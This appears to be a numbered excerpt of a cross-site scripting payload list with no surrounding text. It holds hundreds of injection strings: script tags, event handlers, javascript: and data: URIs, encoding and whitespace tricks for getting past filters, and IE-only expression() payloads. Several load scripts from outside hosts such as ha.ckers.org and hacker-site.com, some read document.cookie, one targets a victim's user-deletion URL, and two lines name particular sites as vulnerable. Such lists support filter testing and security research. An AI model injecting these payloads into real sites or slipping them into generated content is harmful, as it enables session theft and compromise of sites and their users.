  831. 1
  832. ; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
  833. <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
  834. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  835. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  836. <iframe src=javascript:alert(document.location)>
  837. <form><a href="javascript:\u0061lert(1)">X
  838. </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
  839. <img/       
  840. src=`~` onerror=prompt(1)>
  841. <form><iframe        
  842. src="javascript:alert(1)"
  843.         ;>
  844. <a href="data:application/x-x509-user-cert;
  845. base64
  846. ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="       
  847. >X</a
  848. http://www.google<script .com>alert(document.location)</script
  849. <a href=[&#65533;]"&#65533; onmouseover=prompt(1)//">XYZ</a
  850. <img/src=@
  851. onerror = prompt('1')
  852. <style/onload=prompt('XSS')
  853. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  854. </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
  855. &#65533;</form><input type="date" onfocus="alert(1)">
  856. <form><textarea
  857. onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
  858. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  859. <iframe srcdoc='<body onload=prompt(1)>'>
  860. <a href="javascript:void(0)" onmouseover=
  861. javascript:alert(1)
  862. >X</a>
  863. <script ~~~>alert(0%0)</script ~~~>
  864. <style/onload=<!--        >
  865. alert
  866. (1)>
  867. <///style///><span %2F onmousemove='alert(1)'>SPAN
  868. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=        prompt(1)
  869. "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

  870. <blink/
  871. onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
  872. <marquee onstart='javascript:alert(1)'>^__^
  873. <div/style="width:expression(confirm(1))">X</div> {IE7}
  874. <iframe// src=javaSCRIPT:alert(1)
  875. //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
  876. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  877. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  878. </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
  879. <a/href="javascript:
  880. javascript:prompt(1)"><input type="X">
  881. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  882. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
  883. <a href="javascript:\u0061le%72t(1)"><button>
  884. <div onmouseover='alert(1)'>DIV</div>
  885. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  886. <a href="jAvAsCrIpT:alert(1)">X</a>
  887. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  888. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  889. <var onmouseover="prompt(1)">On Mouse Over</var>
  890. <a href=javascript:alert(document.cookie)>Click Here</a>
  891. <img src="/" =_=" title="onerror='prompt(1)'">
  892. <%<!--'%><script>alert(1);</script -->
  893. <script src="data:text/javascript,alert(1)"></script>
  894. <iframe/src \/\/onload = prompt(1)
  895. <iframe/onreadystatechange=alert(1)
  896. <svg/onload=alert(1)
  897. <input value=<><iframe/src=javascript:confirm(1)
  898. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  899. <iframe src=j        a        v        a        s        c        r        i        p        t        :a        l        e        r        t        %28        1        %29></iframe>
  900. <img src=`xx:xx`onerror=alert(1)>
  901. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  902. <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
  903. <math><a xlink:href="//jsfiddle.net/t846h/">click
  904. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  905. <svg contentScriptType=text/vbs><script>MsgBox+1
  906. <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
  907. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  908. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  909. <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  910. <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
  911. <object data=javascript:\u0061le%72t(1)>
  912. <script>+-+-1-+-+alert(1)</script>
  913. <body/onload=<!-->
  914. alert(1)>
  915. <script itworksinallbrowsers>/*<script* */alert(1)</script
  916. <img src ?itworksonchrome?\/onerror = alert(1)
  917. <svg><script>//
  918. confirm(1);</script </svg>
  919. <svg><script onlypossibleinopera:-)> alert(1)
  920. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
  921. <script x> alert(1) </script 1=2
  922. <div/onmouseover='alert(1)'> style="x:">
  923. <--`<img/src=` onerror=alert(1)> --!>
  924. <script/src=data:text/javascript,alert(1)></script>
  925. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  926. "><img src=x onerror=window.open('https://www.google.com/');>
  927. <form><button formaction=javascript:alert(1)>CLICKME
  928. <math><a xlink:href="//jsfiddle.net/t846h/">click
  929. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  930. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  931. <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>&#8203;">Click Me</a>
  932. '';!--"<XSS>=&{()}
  933. '>//\\,<'>">">"*"
  934. '); alert('XSS
  935. <script>alert(1);</script>
  936. <script>alert('XSS');</script>
  937. <IMG SRC="javascript:alert('XSS');">
  938. <IMG SRC=javascript:alert('XSS')>
  939. <IMG SRC=javascript:alert('XSS')>
  940. <IMG SRC=javascript:alert("XSS")>
  941. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  942. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  943. <script>alert(String.fromCharCode(88,83,83))</script>
  944. <img src=foo.png onerror=alert(/xssed/) />
  945. <style>@im\port'\ja\vasc\ript:alert("XSS")';</style>
  946. <? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
  947. <marquee><script>alert('XSS')</script></marquee>
  948. <IMG SRC="jav        ascript:alert('XSS');">
  949. <IMG SRC="jav
  950. ascript:alert('XSS');">
  951. <IMG SRC="jav
  952. ascript:alert('XSS');">
  953. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  954. "><script>alert(0)</script>
  955. <script src=http://yoursite.com/your_files.js></script>
  956. </title><script>alert(/xss/)</script>
  957. </textarea><script>alert(/xss/)</script>
  958. <IMG LOWSRC="javascript:alert('XSS')">
  959. <IMG DYNSRC="javascript:alert('XSS')">
  960. <font style='color:expression(alert(document.cookie))'>
  961. <img src="javascript:alert('XSS')">
  962. <script language="JavaScript">alert('XSS')</script>
  963. <body onunload="javascript:alert('XSS');">
  964. <body onLoad="alert('XSS');"
  965. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  966. "/></a></><img src=1.gif onerror=alert(1)>
  967. window.alert("Bonjour !");
  968. <div style="x:expression((window.r==1)?'':eval('r=1;
  969. alert(String.fromCharCode(88,83,83));'))">
  970. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  971. "><script alert(String.fromCharCode(88,83,83))</script>
  972. '>><marquee><h1>XSS</h1></marquee>
  973. '">><script>alert('XSS')</script>
  974. '">><marquee><h1>XSS</h1></marquee>
  975. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  976. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  977. <script>var var = 1; alert(var)</script>
  978. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  979. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  980. <IMG SRC='vbscript:msgbox("XSS")'>
  981. " onfocus=alert(document.domain) "> <"
  982. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  983. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
  984. perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
  985. perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out
  986. <br size="&{alert('XSS')}">
  987. <scrscriptipt>alert(1)</scrscriptipt>
  988. </br style=a:expression(alert())>
  989. </script><script>alert(1)</script>
  990. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  991. [color=red width=expression(alert(123))][color]
  992. <BASE HREF="javascript:alert('XSS');//">
  993. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  994. "></iframe><script>alert(123)</script>
  995. <body onLoad="while(true) alert('XSS');">
  996. '"></title><script>alert(1111)</script>
  997. </textarea>'"><script>alert(document.cookie)</script>
  998. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  999. </script></script><<<<script><>>>><<<script>alert(123)</script>
  1000. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  1001. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  1002. '></select><script>alert(123)</script>
  1003. '>"><script src = 'http://www.site.com/XSS.js'></script>
  1004. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  1005. <SCRIPT>document.write("XSS");</SCRIPT>
  1006. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  1007. ='><script>alert("xss")</script>
  1008. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  1009. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  1010. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  1011. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  1012. src="http://www.site.com/XSS.js"></script>
  1013. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  1014. !--" /><script>alert('xss');</script>
  1015. <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  1016. "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  1017. '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  1018. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  1019. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  1020. "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
  1021. '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  1022. <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  1023. '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
  1024. "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
  1025. \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
  1026. http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
  1027. http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
  1028. '); alert('xss'); var x='
  1029. \\'); alert(\'xss\');var x=\'
  1030. //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
  1031. >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
  1032. <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
  1033. </body>
  1034. </html>
  1035. <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
  1036. <SCRIPT> alert(“XSS”); </SCRIPT>
  1037. <BODY ONLOAD=alert("XSS")>
  1038. <BODY BACKGROUND="javascript:alert('XSS')">
  1039. <IMG SRC="javascript:alert('XSS');">
  1040. <IMG DYNSRC="javascript:alert('XSS')">
  1041. <IMG LOWSRC="javascript:alert('XSS')">
  1042. <IFRAME SRC=”http://hacker-site.com/xss.html”>
  1043. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  1044. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  1045. <TABLE BACKGROUND="javascript:alert('XSS')">
  1046. <TD BACKGROUND="javascript:alert('XSS')">
  1047. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  1048. <DIV STYLE="width: expression(alert('XSS'));">
  1049. <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
  1050. <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
  1051. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1052. '';!--"<XSS>=&{()}
  1053. <SCRIPT>alert('XSS')</SCRIPT>
  1054. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  1055. <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1056. <BASE HREF="javascript:alert('XSS');//">
  1057. <BGSOUND SRC="javascript:alert('XSS');">
  1058. <BODY BACKGROUND="javascript:alert('XSS');">
  1059. <BODY ONLOAD=alert('XSS')>
  1060. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  1061. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  1062. <DIV STYLE="width: expression(alert('XSS'));">
  1063. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  1064. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  1065. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  1066. <IMG SRC="javascript:alert('XSS');">
  1067. <IMG SRC=javascript:alert('XSS')>
  1068. <IMG DYNSRC="javascript:alert('XSS');">
  1069. <IMG LOWSRC="javascript:alert('XSS');">
  1070. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  1071. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  1072. exp/*<XSS STYLE='no\xss:noxss("*//*");
  1073. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
  1074. <IMG SRC='vbscript:msgbox("XSS")'>
  1075. <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
  1076. <IMG SRC="livescript:[code]">
  1077. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1078. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  1079. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  1080. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  1081. <IMG SRC="mocha:[code]">
  1082. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  1083. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
  1084. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  1085. a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
  1086. eval(a+b+c+d);
  1087. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  1088. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  1089. <XSS STYLE="xss:expression(alert('XSS'))">
  1090. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  1091. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  1092. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  1093. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  1094. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  1095. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  1096. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  1097. <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
  1098. <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
  1099. <HTML xmlns:xss>
  1100. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
  1101. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
  1102. <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
  1103. <HTML><BODY>
  1104. <!--[if gte IE 4]>               
  1105. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  1106. <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
  1107. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  1108. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  1109. <? echo('<SCR)';
  1110. <BR SIZE="&{alert('XSS')}">
  1111. <IMG SRC=JaVaScRiPt:alert('XSS')>
  1112. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  1113. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  1114. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  1115. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  1116. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  1117. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1118. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1119. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  1120. ";alert('XSS');//
  1121. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  1122. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  1123. <IMG SRC="jav        ascript:alert('XSS');">
  1124. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  1125. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  1126. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  1127. <IMG
  1128. SRC
  1129. =
  1130. "
  1131. j
  1132. a
  1133. v
  1134. a
  1135. s
  1136. c
  1137. r
  1138. i
  1139. p
  1140. t
  1141. :
  1142. a
  1143. l
  1144. e
  1145. r
  1146. t
  1147. (
  1148. '
  1149. X
  1150. S
  1151. S
  1152. '
  1153. )
  1154. "
  1155. >
  1156. perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
  1157. perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
  1158. <IMG SRC=" &#14;  javascript:alert('XSS');">
  1159. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1160. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  1161. <SCRIPT SRC=http://ha.ckers.org/xss.js
  1162. <SCRIPT SRC=//ha.ckers.org/.j>
  1163. <IMG SRC="javascript:alert('XSS')"
  1164. <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
  1165. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1166. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  1167. <SCRIPT>a=/XSS/
  1168. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1169. <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1170. <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1171. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1172. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1173. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1174. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1175. <A HREF="http://66.102.7.147/">XSS</A>
  1176. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  1177. <A HREF="http://1113982867/">XSS</A>
  1178. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  1179. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  1180. <A HREF="h
  1181. tt        p://6&#09;6.000146.0x7.147/">XSS</A>
  1182. <A HREF="//www.google.com/">XSS</A>
  1183. <A HREF="//google">XSS</A>
  1184. <A HREF="http://ha.ckers.org@google">XSS</A>
  1185. <A HREF="http://google:ha.ckers.org">XSS</A>
  1186. <A HREF="http://google.com/">XSS</A>
  1187. <A HREF="http://www.google.com./">XSS</A>
  1188. <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
  1189. <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
  1190. <script>document.vulnerable=true;</script>
  1191. <img SRC="jav ascript:document.vulnerable=true;">
  1192. <img SRC="javascript:document.vulnerable=true;">
  1193. <img SRC="  javascript:document.vulnerable=true;">
  1194. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1195. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  1196. <script <B>document.vulnerable=true;</script>
  1197. <img SRC="javascript:document.vulnerable=true;"
  1198. <iframe src="javascript:document.vulnerable=true; <
  1199. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  1200. ";document.vulnerable=true;;//
  1201. </title><SCRIPT>document.vulnerable=true;</script>
  1202. <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
  1203. <body BACKGROUND="javascript:document.vulnerable=true;">
  1204. <body ONLOAD=document.vulnerable=true;>
  1205. <img DYNSRC="javascript:document.vulnerable=true;">
  1206. <img LOWSRC="javascript:document.vulnerable=true;">
  1207. <bgsound SRC="javascript:document.vulnerable=true;">
  1208. <br SIZE="&{document.vulnerable=true}">
  1209. <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
  1210. <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
  1211. <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
  1212. <img SRC='vbscript:document.vulnerable=true;'>
  1213. 1script3document.vulnerable=true;1/script3
  1214. <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
  1215. <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
  1216. <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
  1217. <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
  1218. <table BACKGROUND="javascript:document.vulnerable=true;">
  1219. <table><TD BACKGROUND="javascript:document.vulnerable=true;">
  1220. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1221. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1222. <div STYLE="width: expression(document.vulnerable=true);">
  1223. <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
  1224. <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
  1225. <XSS STYLE="xss:expression(document.vulnerable=true)">
  1226. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
  1227. <style TYPE="text/javascript">document.vulnerable=true;</style>
  1228. <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
  1229. <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
  1230. <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
  1231. <base HREF="javascript:document.vulnerable=true;//">
  1232. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  1233. <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  1234. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
  1235. <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
  1236. <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
